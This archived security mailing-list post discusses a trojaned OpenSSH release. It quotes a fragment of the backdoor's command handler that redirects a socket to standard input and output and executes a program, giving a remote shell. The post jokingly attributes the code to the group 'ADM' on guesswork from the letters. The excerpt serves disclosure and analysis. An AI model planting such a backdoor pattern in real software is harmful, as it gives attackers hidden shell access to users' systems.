| lists.openwall.net | lists / announce john-users owl-users popa3d-users / xvendor oss-security / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 | |
|
Open Source and information security mailing list archives
| ||
|
From: evrim at core.gen.tr (evrim@...e.gen.tr)
Subject: OpenSSH trojan! I KNOW WHO DID IT!
I may know who did it. Let's look at code:
switch(c) {
case 'A':
exit(0);
case 'D':
alarm(0);
dup2(s,0);
dup2(s,1);
dup2(s,2);
a[0]=i_val;
a[1]=NULL;
execve(a[0],a,NULL);
break;
case 'M':
alarm(0);
sig(0);
break;
default:
There are 3 options: Which makes up to A+D+M=ADM :-)))))))
ADM is back ? great eheheh.
--
Evrim ULU
evrim@...y.com.tr / evrim@...e.gen.tr
sysadm
http://www.core.gen.tr